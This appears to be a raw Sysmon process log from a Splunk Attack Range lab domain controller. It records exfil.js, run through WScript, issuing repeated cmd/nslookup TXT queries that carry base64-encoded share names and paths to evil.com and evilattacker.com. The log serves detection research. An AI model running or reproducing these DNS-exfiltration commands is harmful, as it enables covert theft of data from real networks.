ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.Exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=TXT U2hhcmVQYXRoOiBDOlxXaW5kb3dzXFNZU1ZPTFxzeXN2b2xcYXR0YWNrcmFuZ2UubG9jYWxcU0NSSVBUUw== evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nlbxxy.tmp 2>&1C:\Temp\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A{A8622C2F-58C3-6078-FC0D-00000000AE01}4860C:\Windows\System32\wscript.exe"C:\Windows\System32\WScript.exe" "C:\Temp\exfil.js" 154100x800000000000000071942Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 15:25:22.206{A8622C2F-5AE2-6078-0B0F-00000000AE01}564C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe8.0.2Windows Print Monitor splunk ApplicationSplunk Inc.splunk-winprintmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe"C:\Windows\system32\NT 
AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=36D3753920C5BBCA16D12DEAD7A3A904,SHA256=EA17F69FB116CFA6ADC3CE07EBBAE3FD2CB221F25E3F7A9ADF3F15DA051831E2,IMPHASH=264D4B9546D98D77D97F569F55A0B748{A8622C2F-439F-6078-3205-00000000AE01}5132C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 154100x800000000000000071931Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 15:25:21.346{A8622C2F-5AE1-6078-0A0F-00000000AE01}5184C:\Windows\System32\nslookup.exe10.0.14393.0 (rs1_release.160715-1616)nslookupMicrosoft® Windows® Operating SystemMicrosoft Corporationnslookup.exenslookup.exe -timeout=5 -retry=3 -type=TXT U2hhcmVEZXNjOiBMb2dvbiBzZXJ2ZXIgc2hhcmUg evil.com C:\temp\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=488698C899FE524430270C1D14FE99CF,SHA256=24553BFAB13871FAF3EE6F1F8EFECC5D25368A706A42CA35319228D3547418FA,IMPHASH=446F3F94B921C80C9E9497075AA3EF61{A8622C2F-5AE1-6078-080F-00000000AE01}5456C:\Windows\System32\cmd.exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=TXT U2hhcmVEZXNjOiBMb2dvbiBzZXJ2ZXIgc2hhcmUg evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nlpvb.tmp 2>&1 154100x800000000000000071920Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 15:25:21.316{A8622C2F-5AE1-6078-080F-00000000AE01}5456C:\Windows\System32\cmd.exe10.0.14393.0 (rs1_release.160715-1616)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.Exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=TXT U2hhcmVEZXNjOiBMb2dvbiBzZXJ2ZXIgc2hhcmUg evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nlpvb.tmp 
2>&1C:\temp\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A{A8622C2F-58B2-6078-F10D-00000000AE01}2576C:\Windows\System32\wscript.exe"C:\Windows\System32\WScript.exe" "C:\temp\exfil.js" 154100x800000000000000071908Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 15:25:20.642{A8622C2F-5AE0-6078-070F-00000000AE01}6492C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe" --ps2C:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{A8622C2F-439F-6078-3205-00000000AE01}5132C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 154100x800000000000000071899Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 15:25:19.960{A8622C2F-5ADF-6078-060F-00000000AE01}7060C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{A8622C2F-439F-6078-3205-00000000AE01}5132C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 154100x800000000000000071885Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 15:25:19.294{A8622C2F-5ADF-6078-050F-00000000AE01}1408C:\Program 
Files\SplunkUniversalForwarder\bin\splunk-regmon.exe8.0.2Registry monitorsplunk ApplicationSplunk Inc.splunk-regmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=91F33F605825B72EE2270559C7AB28F3,SHA256=3DF1CB71BB48B8669BD01179FD94DD8CC82F8103B08A0FACFD366E43E0C5FA42,IMPHASH=23D7D4307FBE7FA4F42B1902826D7C25{A8622C2F-439F-6078-3205-00000000AE01}5132C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 154100x800000000000000071870Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 15:25:17.476{A8622C2F-5ADD-6078-040F-00000000AE01}6032C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe8.0.2Network monitorSplunk ApplicationSplunk Inc.splunk-netmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=8746B8C1724B67C2B1261446C0CFAA57,SHA256=7EFD09FD383FAA75C5D2990E6DBBFD846AEAA08B7037C7D66B4A0EF2AE0866B3,IMPHASH=7B985F47B35272AD7B5218255ACE7AEC{A8622C2F-439F-6078-3205-00000000AE01}5132C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 154100x800000000000000071860Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 15:25:16.811{A8622C2F-5ADC-6078-030F-00000000AE01}4808C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe10.0.10011.16384SplunkMonNoHandle Control ProgramWindows (R) Win 7 DDK driverWindows (R) Win 7 DDK providerSplunkMonNoHandle.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe"C:\Windows\system32\NT 
AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=BF28C74E12839E40CD89696C7CB01573,SHA256=6187325F302F232DE582FE28E0E0D2B292AB8122C3356C9CE295A482D7B93EA3,IMPHASH=27776F2813155A6CF34F6A075A0C2EC8{A8622C2F-439F-6078-3205-00000000AE01}5132C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 154100x800000000000000071849Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 15:25:16.193{A8622C2F-5ADC-6078-020F-00000000AE01}5628C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe8.0.2Active Directory monitorsplunk ApplicationSplunk Inc.splunk-admon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=947139F3BB2AB70CAF692A60C7A3A735,SHA256=940554A0170A70F634689CC84B00C51AC0BCF773C9639E1305E3672441FC85C8,IMPHASH=357CEC18833E7FF2ABFB722902B13165{A8622C2F-439F-6078-3205-00000000AE01}5132C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 154100x800000000000000071784Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 15:25:06.276{A8622C2F-5AD2-6078-010F-00000000AE01}3220C:\Windows\System32\nslookup.exe10.0.14393.0 (rs1_release.160715-1616)nslookupMicrosoft® Windows® Operating SystemMicrosoft Corporationnslookup.exenslookup.exe -timeout=5 -retry=3 -type=TXT U2hhcmVQYXRoOiBDOlxXaW5kb3dzXFNZU1ZPTFxzeXN2b2xcYXR0YWNrcmFuZ2UubG9jYWxcU0NSSVBUUw== evil.com C:\temp\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=488698C899FE524430270C1D14FE99CF,SHA256=24553BFAB13871FAF3EE6F1F8EFECC5D25368A706A42CA35319228D3547418FA,IMPHASH=446F3F94B921C80C9E9497075AA3EF61{A8622C2F-5AD2-6078-FF0E-00000000AE01}1372C:\Windows\System32\cmd.exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=TXT 
U2hhcmVQYXRoOiBDOlxXaW5kb3dzXFNZU1ZPTFxzeXN2b2xcYXR0YWNrcmFuZ2UubG9jYWxcU0NSSVBUUw== evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nlodee.tmp 2>&1 154100x800000000000000071773Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 15:25:06.247{A8622C2F-5AD2-6078-FF0E-00000000AE01}1372C:\Windows\System32\cmd.exe10.0.14393.0 (rs1_release.160715-1616)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.Exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=TXT U2hhcmVQYXRoOiBDOlxXaW5kb3dzXFNZU1ZPTFxzeXN2b2xcYXR0YWNrcmFuZ2UubG9jYWxcU0NSSVBUUw== evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nlodee.tmp 2>&1C:\temp\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A{A8622C2F-58B2-6078-F10D-00000000AE01}2576C:\Windows\System32\wscript.exe"C:\Windows\System32\WScript.exe" "C:\temp\exfil.js" 154100x800000000000000071719Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 15:24:53.770{A8622C2F-5AC5-6078-FE0E-00000000AE01}5988C:\Windows\System32\nslookup.exe10.0.14393.0 (rs1_release.160715-1616)nslookupMicrosoft® Windows® Operating SystemMicrosoft Corporationnslookup.exenslookup.exe -timeout=5 -retry=3 -type=TXT U2hhcmVOYW1lOiBORVRMT0dPTg== evil.com C:\Temp\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=488698C899FE524430270C1D14FE99CF,SHA256=24553BFAB13871FAF3EE6F1F8EFECC5D25368A706A42CA35319228D3547418FA,IMPHASH=446F3F94B921C80C9E9497075AA3EF61{A8622C2F-5AC5-6078-FC0E-00000000AE01}1996C:\Windows\System32\cmd.exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=TXT U2hhcmVOYW1lOiBORVRMT0dPTg== evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nlgfap.tmp 2>&1 
154100x800000000000000071708Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 15:24:53.741{A8622C2F-5AC5-6078-FC0E-00000000AE01}1996C:\Windows\System32\cmd.exe10.0.14393.0 (rs1_release.160715-1616)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.Exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=TXT U2hhcmVOYW1lOiBORVRMT0dPTg== evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nlgfap.tmp 2>&1C:\Temp\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A{A8622C2F-58C3-6078-FC0D-00000000AE01}4860C:\Windows\System32\wscript.exe"C:\Windows\System32\WScript.exe" "C:\Temp\exfil.js" 154100x800000000000000071649Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 15:24:39.250{A8622C2F-5AB7-6078-FB0E-00000000AE01}1140C:\Windows\System32\nslookup.exe10.0.14393.0 (rs1_release.160715-1616)nslookupMicrosoft® Windows® Operating SystemMicrosoft Corporationnslookup.exenslookup.exe -timeout=5 -retry=3 -type=TXT U2hhcmVQYXRoOiBDOlxXaW5kb3dz evil.com C:\Temp\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=488698C899FE524430270C1D14FE99CF,SHA256=24553BFAB13871FAF3EE6F1F8EFECC5D25368A706A42CA35319228D3547418FA,IMPHASH=446F3F94B921C80C9E9497075AA3EF61{A8622C2F-5AB7-6078-F90E-00000000AE01}7036C:\Windows\System32\cmd.exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=TXT U2hhcmVQYXRoOiBDOlxXaW5kb3dz evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nltmrwus.tmp 2>&1 154100x800000000000000071638Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 15:24:39.218{A8622C2F-5AB7-6078-F90E-00000000AE01}7036C:\Windows\System32\cmd.exe10.0.14393.0 (rs1_release.160715-1616)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft 
CorporationCmd.Exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=TXT U2hhcmVQYXRoOiBDOlxXaW5kb3dz evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nltmrwus.tmp 2>&1C:\Temp\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A{A8622C2F-58DF-6078-060E-00000000AE01}2824C:\Windows\System32\wscript.exe"C:\Windows\System32\WScript.exe" "C:\Temp\exfil.js" 154100x800000000000000071629Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 15:24:38.619{A8622C2F-5AB6-6078-F80E-00000000AE01}5184C:\Windows\System32\nslookup.exe10.0.14393.0 (rs1_release.160715-1616)nslookupMicrosoft® Windows® Operating SystemMicrosoft Corporationnslookup.exenslookup.exe -timeout=5 -retry=3 -type=TXT KioqV2luMzJfU2hhcmUqKio= evilattacker.com C:\Temp\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=488698C899FE524430270C1D14FE99CF,SHA256=24553BFAB13871FAF3EE6F1F8EFECC5D25368A706A42CA35319228D3547418FA,IMPHASH=446F3F94B921C80C9E9497075AA3EF61{A8622C2F-5AB6-6078-F60E-00000000AE01}4808C:\Windows\System32\cmd.exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=TXT KioqV2luMzJfU2hhcmUqKio= evilattacker.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nlmzma.tmp 2>&1 154100x800000000000000071618Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 15:24:38.588{A8622C2F-5AB6-6078-F60E-00000000AE01}4808C:\Windows\System32\cmd.exe10.0.14393.0 (rs1_release.160715-1616)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.Exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=TXT KioqV2luMzJfU2hhcmUqKio= evilattacker.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nlmzma.tmp 
2>&1C:\Temp\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A{A8622C2F-5932-6078-370E-00000000AE01}184C:\Windows\System32\wscript.exe"C:\Windows\System32\WScript.exe" "C:\Temp\exfil.js" 154100x800000000000000071588Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 15:24:36.176{A8622C2F-5AB4-6078-F50E-00000000AE01}5456C:\Windows\System32\nslookup.exe10.0.14393.0 (rs1_release.160715-1616)nslookupMicrosoft® Windows® Operating SystemMicrosoft Corporationnslookup.exenslookup.exe -timeout=5 -retry=3 -type=TXT U2hhcmVOYW1lOiBORVRMT0dPTg== evil.com C:\temp\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=488698C899FE524430270C1D14FE99CF,SHA256=24553BFAB13871FAF3EE6F1F8EFECC5D25368A706A42CA35319228D3547418FA,IMPHASH=446F3F94B921C80C9E9497075AA3EF61{A8622C2F-5AB4-6078-F30E-00000000AE01}5344C:\Windows\System32\cmd.exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=TXT U2hhcmVOYW1lOiBORVRMT0dPTg== evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nlwwf.tmp 2>&1 154100x800000000000000071576Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 15:24:36.147{A8622C2F-5AB4-6078-F30E-00000000AE01}5344C:\Windows\System32\cmd.exe10.0.14393.0 (rs1_release.160715-1616)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.Exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=TXT U2hhcmVOYW1lOiBORVRMT0dPTg== evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nlwwf.tmp 
2>&1C:\temp\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A{A8622C2F-58B2-6078-F10D-00000000AE01}2576C:\Windows\System32\wscript.exe"C:\Windows\System32\WScript.exe" "C:\temp\exfil.js" 154100x800000000000000071487Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 15:24:23.685{A8622C2F-5AA7-6078-F20E-00000000AE01}5316C:\Windows\System32\nslookup.exe10.0.14393.0 (rs1_release.160715-1616)nslookupMicrosoft® Windows® Operating SystemMicrosoft Corporationnslookup.exenslookup.exe -timeout=5 -retry=3 -type=TXT U2hhcmVEZXNjOiBSZW1vdGUgSVBD evil.com C:\Temp\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=488698C899FE524430270C1D14FE99CF,SHA256=24553BFAB13871FAF3EE6F1F8EFECC5D25368A706A42CA35319228D3547418FA,IMPHASH=446F3F94B921C80C9E9497075AA3EF61{A8622C2F-5AA7-6078-F00E-00000000AE01}928C:\Windows\System32\cmd.exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=TXT U2hhcmVEZXNjOiBSZW1vdGUgSVBD evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nlzgmxa.tmp 2>&1 154100x800000000000000071476Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 15:24:23.655{A8622C2F-5AA7-6078-F00E-00000000AE01}928C:\Windows\System32\cmd.exe10.0.14393.0 (rs1_release.160715-1616)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.Exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=TXT U2hhcmVEZXNjOiBSZW1vdGUgSVBD evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nlzgmxa.tmp 
2>&1C:\Temp\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A{A8622C2F-58C3-6078-FC0D-00000000AE01}4860C:\Windows\System32\wscript.exe"C:\Windows\System32\WScript.exe" "C:\Temp\exfil.js" 154100x800000000000000071461Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 15:24:22.356{A8622C2F-5AA6-6078-EF0E-00000000AE01}5864C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe8.0.2Windows Print Monitor splunk ApplicationSplunk Inc.splunk-winprintmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=36D3753920C5BBCA16D12DEAD7A3A904,SHA256=EA17F69FB116CFA6ADC3CE07EBBAE3FD2CB221F25E3F7A9ADF3F15DA051831E2,IMPHASH=264D4B9546D98D77D97F569F55A0B748{A8622C2F-439F-6078-3205-00000000AE01}5132C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 154100x800000000000000071447Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 15:24:20.548{A8622C2F-5AA4-6078-EE0E-00000000AE01}2196C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{A8622C2F-439F-6078-3205-00000000AE01}5132C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 154100x800000000000000071437Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 
15:24:19.944{A8622C2F-5AA3-6078-ED0E-00000000AE01}3912C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe8.0.2Registry monitorsplunk ApplicationSplunk Inc.splunk-regmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=91F33F605825B72EE2270559C7AB28F3,SHA256=3DF1CB71BB48B8669BD01179FD94DD8CC82F8103B08A0FACFD366E43E0C5FA42,IMPHASH=23D7D4307FBE7FA4F42B1902826D7C25{A8622C2F-439F-6078-3205-00000000AE01}5132C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 154100x800000000000000071426Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 15:24:19.280{A8622C2F-5AA3-6078-EC0E-00000000AE01}6672C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe" --ps2C:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{A8622C2F-439F-6078-3205-00000000AE01}5132C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 154100x800000000000000071410Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 15:24:17.433{A8622C2F-5AA1-6078-EB0E-00000000AE01}5316C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe8.0.2Network monitorSplunk ApplicationSplunk Inc.splunk-netmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe"C:\Windows\system32\NT 
AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=8746B8C1724B67C2B1261446C0CFAA57,SHA256=7EFD09FD383FAA75C5D2990E6DBBFD846AEAA08B7037C7D66B4A0EF2AE0866B3,IMPHASH=7B985F47B35272AD7B5218255ACE7AEC{A8622C2F-439F-6078-3205-00000000AE01}5132C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 154100x800000000000000071402Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 15:24:16.767{A8622C2F-5AA0-6078-EA0E-00000000AE01}3904C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe10.0.10011.16384SplunkMonNoHandle Control ProgramWindows (R) Win 7 DDK driverWindows (R) Win 7 DDK providerSplunkMonNoHandle.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=BF28C74E12839E40CD89696C7CB01573,SHA256=6187325F302F232DE582FE28E0E0D2B292AB8122C3356C9CE295A482D7B93EA3,IMPHASH=27776F2813155A6CF34F6A075A0C2EC8{A8622C2F-439F-6078-3205-00000000AE01}5132C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 154100x800000000000000071391Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 15:24:16.193{A8622C2F-5AA0-6078-E90E-00000000AE01}6032C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe8.0.2Active Directory monitorsplunk ApplicationSplunk Inc.splunk-admon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=947139F3BB2AB70CAF692A60C7A3A735,SHA256=940554A0170A70F634689CC84B00C51AC0BCF773C9639E1305E3672441FC85C8,IMPHASH=357CEC18833E7FF2ABFB722902B13165{A8622C2F-439F-6078-3205-00000000AE01}5132C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 
154100x800000000000000071316Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 15:24:06.101{A8622C2F-5A96-6078-E80E-00000000AE01}4764C:\Windows\System32\nslookup.exe10.0.14393.0 (rs1_release.160715-1616)nslookupMicrosoft® Windows® Operating SystemMicrosoft Corporationnslookup.exenslookup.exe -timeout=5 -retry=3 -type=TXT U2hhcmVEZXNjOiBSZW1vdGUgSVBD evil.com C:\temp\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=488698C899FE524430270C1D14FE99CF,SHA256=24553BFAB13871FAF3EE6F1F8EFECC5D25368A706A42CA35319228D3547418FA,IMPHASH=446F3F94B921C80C9E9497075AA3EF61{A8622C2F-5A96-6078-E60E-00000000AE01}6516C:\Windows\System32\cmd.exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=TXT U2hhcmVEZXNjOiBSZW1vdGUgSVBD evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nlzcottg.tmp 2>&1 154100x800000000000000071305Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 